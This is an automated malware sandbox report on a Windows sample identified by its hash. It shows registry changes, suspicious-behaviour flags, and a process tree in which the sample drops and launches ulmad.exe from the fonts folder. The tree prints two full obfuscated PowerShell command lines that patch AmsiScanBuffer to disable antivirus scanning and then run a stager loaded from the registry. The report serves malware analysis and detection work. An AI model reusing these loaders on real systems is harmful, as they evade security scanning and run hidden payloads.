\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ulmad.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exeulmad.exeulmad.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exeWerFault.exesvchost.exepid process 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe 4316 ulmad.exe 4316 ulmad.exe 2900 ulmad.exe 2900 ulmad.exe 2900 ulmad.exe 2900 ulmad.exe 3340 powershell.EXE 3340 powershell.EXE 1416 powershell.EXE 1416 powershell.EXE 3340 powershell.EXE 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 1416 powershell.EXE 5072 dllhost.exe 5072 dllhost.exe 5072 dllhost.exe 5072 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 5072 dllhost.exe 5072 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 5072 dllhost.exe 5072 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 1960 WerFault.exe 1960 WerFault.exe 5072 dllhost.exe 5072 dllhost.exe 3540 dllhost.exe 3540 dllhost.exe 5072 dllhost.exe 5072 dllhost.exe 5096 svchost.exe 5096 svchost.exe 3540 dllhost.exe 3540 dllhost.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exepid process 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exeulmad.exeulmad.exepowershell.EXEpowershell.EXEdllhost.exemousocoreworker.exedllhost.exesvchost.exeRuntimeBroker.exeWMIC.exepowercfg.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe Token: SeDebugPrivilege 4316 ulmad.exe Token: SeDebugPrivilege 2900 ulmad.exe Token: SeDebugPrivilege 2900 ulmad.exe Token: SeDebugPrivilege 3340 powershell.EXE Token: SeDebugPrivilege 1416 powershell.EXE Token: SeDebugPrivilege 3340 powershell.EXE Token: SeDebugPrivilege 3540 dllhost.exe Token: SeShutdownPrivilege 4508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4508 mousocoreworker.exe Token: SeDebugPrivilege 1416 powershell.EXE Token: SeDebugPrivilege 5072 dllhost.exe Token: SeShutdownPrivilege 4328 svchost.exe Token: SeCreatePagefilePrivilege 4328 svchost.exe Token: SeShutdownPrivilege 4508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4508 mousocoreworker.exe Token: SeShutdownPrivilege 3920 RuntimeBroker.exe Token: SeShutdownPrivilege 4508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4508 mousocoreworker.exe Token: SeShutdownPrivilege 3920 RuntimeBroker.exe Token: SeShutdownPrivilege 4508 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4508 mousocoreworker.exe Token: SeAssignPrimaryTokenPrivilege 2940 WMIC.exe Token: SeIncreaseQuotaPrivilege 2940 WMIC.exe Token: SeSecurityPrivilege 2940 WMIC.exe Token: SeTakeOwnershipPrivilege 2940 WMIC.exe Token: SeLoadDriverPrivilege 2940 WMIC.exe Token: SeSystemtimePrivilege 2940 WMIC.exe Token: SeBackupPrivilege 2940 WMIC.exe Token: SeRestorePrivilege 2940 WMIC.exe Token: SeShutdownPrivilege 2940 WMIC.exe Token: SeSystemEnvironmentPrivilege 2940 WMIC.exe Token: SeUndockPrivilege 2940 WMIC.exe Token: SeManageVolumePrivilege 2940 WMIC.exe Token: SeShutdownPrivilege 3276 powercfg.exe Token: SeCreatePagefilePrivilege 3276 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1184 WMIC.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeSecurityPrivilege 1184 WMIC.exe Token: SeTakeOwnershipPrivilege 1184 WMIC.exe Token: SeLoadDriverPrivilege 1184 WMIC.exe Token: SeSystemtimePrivilege 1184 WMIC.exe Token: SeBackupPrivilege 1184 WMIC.exe Token: SeRestorePrivilege 1184 WMIC.exe Token: SeShutdownPrivilege 1184 WMIC.exe Token: SeSystemEnvironmentPrivilege 1184 WMIC.exe Token: SeUndockPrivilege 1184 WMIC.exe Token: SeManageVolumePrivilege 1184 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2940 WMIC.exe Token: SeIncreaseQuotaPrivilege 2940 WMIC.exe Token: SeSecurityPrivilege 2940 WMIC.exe Token: SeTakeOwnershipPrivilege 2940 WMIC.exe Token: SeLoadDriverPrivilege 2940 WMIC.exe Token: SeSystemtimePrivilege 2940 WMIC.exe Token: SeBackupPrivilege 2940 WMIC.exe Token: SeRestorePrivilege 2940 WMIC.exe Token: SeShutdownPrivilege 2940 WMIC.exe Token: SeSystemEnvironmentPrivilege 2940 WMIC.exe Token: SeUndockPrivilege 2940 WMIC.exe Token: SeManageVolumePrivilege 2940 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1184 WMIC.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeSecurityPrivilege 1184 WMIC.exe Token: SeTakeOwnershipPrivilege 1184 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
emmwdz.exepid process 1612 emmwdz.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exeulmad.exeulmad.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exepid process 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe 4316 ulmad.exe 2900 ulmad.exe 4092 Conhost.exe 768 Conhost.exe 4828 Conhost.exe 4724 Conhost.exe 3872 Conhost.exe 1216 Conhost.exe 3212 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.execmd.exeulmad.exepowershell.EXEdllhost.exelsass.exedescription pid process target process PID 3660 wrote to memory of 2300 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe cmd.exe PID 3660 wrote to memory of 2300 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe cmd.exe PID 3660 wrote to memory of 2300 3660 ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe cmd.exe PID 2300 wrote to memory of 848 2300 cmd.exe PING.EXE PID 2300 wrote to memory of 848 2300 cmd.exe PING.EXE PID 2300 wrote to memory of 848 2300 cmd.exe PING.EXE PID 2300 wrote to memory of 4316 2300 cmd.exe ulmad.exe PID 2300 wrote to memory of 4316 2300 cmd.exe ulmad.exe PID 2300 wrote to memory of 4316 2300 cmd.exe ulmad.exe PID 2900 wrote to memory of 3216 2900 ulmad.exe vodije.exe PID 2900 wrote to memory of 3216 2900 ulmad.exe vodije.exe PID 2900 wrote to memory of 3216 2900 ulmad.exe vodije.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3340 wrote to memory of 3540 3340 powershell.EXE dllhost.exe PID 3540 wrote to memory of 612 3540 dllhost.exe winlogon.exe PID 3540 wrote to memory of 680 3540 dllhost.exe lsass.exe PID 3540 wrote to memory of 964 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 376 3540 dllhost.exe dwm.exe PID 3540 wrote to memory of 428 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 960 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1112 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1144 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1164 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1232 3540 dllhost.exe svchost.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 680 wrote to memory of 4508 680 lsass.exe mousocoreworker.exe PID 3540 wrote to memory of 1280 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1344 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1364 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1452 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1492 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1536 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1572 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1680 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1700 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1760 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1796 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1936 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1972 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 2004 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 2016 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 1968 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 2072 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 2168 3540 dllhost.exe spoolsv.exe PID 3540 wrote to memory of 2244 3540 dllhost.exe svchost.exe PID 3540 wrote to memory of 2352 3540 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:376
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{37567759-7b93-4095-9d66-cebeba15cbd8}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3540
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{7ba66a6f-04c9-4006-bdc7-b5657b992d60}2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1112 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sqbsbmPAavpv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$obvXmXxxpvikVL,[Parameter(Position=1)][Type]$WDHtewRmjw)$iMNOccIrXeE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$iMNOccIrXeE.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$obvXmXxxpvikVL).SetImplementationFlags('Runtime,Managed');$iMNOccIrXeE.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$WDHtewRmjw,$obvXmXxxpvikVL).SetImplementationFlags('Runtime,Managed');Write-Output $iMNOccIrXeE.CreateType();}$vFlyqgNQMgTCs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$WceENVINTuCPdU=$vFlyqgNQMgTCs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QJdRNInVwHzAhFjMcuM=sqbsbmPAavpv @([String])([IntPtr]);$qWcaZNJxHanpBlnspfyZQl=sqbsbmPAavpv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cTARaQCYqyf=$vFlyqgNQMgTCs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$iGsvXcCMJTTSBy=$WceENVINTuCPdU.Invoke($Null,@([Object]$cTARaQCYqyf,[Object]('Load'+'LibraryA')));$WpwLDZUIgvljCRalZ=$WceENVINTuCPdU.Invoke($Null,@([Object]$cTARaQCYqyf,[Object]('Vir'+'tual'+'Pro'+'tect')));$hSjzuSm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iGsvXcCMJTTSBy,$QJdRNInVwHzAhFjMcuM).Invoke('a'+'m'+'si.dll');$mLMsRZzkuvimEQIgC=$WceENVINTuCPdU.Invoke($Null,@([Object]$hSjzuSm,[Object]('Ams'+'iSc'+'an'+'Buffer')));$FqtTudQDUR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WpwLDZUIgvljCRalZ,$qWcaZNJxHanpBlnspfyZQl).Invoke($mLMsRZzkuvimEQIgC,[uint32]8,4,[ref]$FqtTudQDUR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mLMsRZzkuvimEQIgC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WpwLDZUIgvljCRalZ,$qWcaZNJxHanpBlnspfyZQl).Invoke($mLMsRZzkuvimEQIgC,[uint32]8,0x20,[ref]$FqtTudQDUR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$xuxqcmogstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnOlFfQLjXFg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AfPizBcZpMqwnG,[Parameter(Position=1)][Type]$IRINqZfkzC)$nsaGoMTYxBW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$nsaGoMTYxBW.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$AfPizBcZpMqwnG).SetImplementationFlags('Runtime,Managed');$nsaGoMTYxBW.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$IRINqZfkzC,$AfPizBcZpMqwnG).SetImplementationFlags('Runtime,Managed');Write-Output $nsaGoMTYxBW.CreateType();}$rbINCxZfPmMNH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$uJpxfVGvJdClWN=$rbINCxZfPmMNH.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KrnTGUjLCunDLbyMHSE=TnOlFfQLjXFg @([String])([IntPtr]);$vpHRMrJHiXrcDLCqrAlaHP=TnOlFfQLjXFg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CWnjsxkOwxA=$rbINCxZfPmMNH.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$VTDlqBJlJGPRfp=$uJpxfVGvJdClWN.Invoke($Null,@([Object]$CWnjsxkOwxA,[Object]('Load'+'LibraryA')));$LPlFWByyuwCWcVcQc=$uJpxfVGvJdClWN.Invoke($Null,@([Object]$CWnjsxkOwxA,[Object]('Vir'+'tual'+'Pro'+'tect')));$hRuObMH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VTDlqBJlJGPRfp,$KrnTGUjLCunDLbyMHSE).Invoke('a'+'m'+'si.dll');$jysJJvEKuNymEIbYu=$uJpxfVGvJdClWN.Invoke($Null,@([Object]$hRuObMH,[Object]('Ams'+'iSc'+'an'+'Buffer')));$iSPrPZQiiN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LPlFWByyuwCWcVcQc,$vpHRMrJHiXrcDLCqrAlaHP).Invoke($jysJJvEKuNymEIbYu,[uint32]8,4,[ref]$iSPrPZQiiN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jysJJvEKuNymEIbYu,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LPlFWByyuwCWcVcQc,$vpHRMrJHiXrcDLCqrAlaHP).Invoke($jysJJvEKuNymEIbYu,[uint32]8,0x20,[ref]$iSPrPZQiiN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$xuxqcmogstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2940
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in Windows directory
PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1452
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2668
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2728
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2988
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3388
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3396
-
C:\Users\Admin\AppData\Local\Temp\ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe"C:\Users\Admin\AppData\Local\Temp\ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe"2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\upaxef\ulmad.exe3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 54⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:848
-
-
\??\c:\windows\fonts\upaxef\ulmad.exec:\windows\fonts\upaxef\ulmad.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4316
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3560
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3752
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4072
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2000
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2000 -s 7682⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1960
-
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1484
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2496
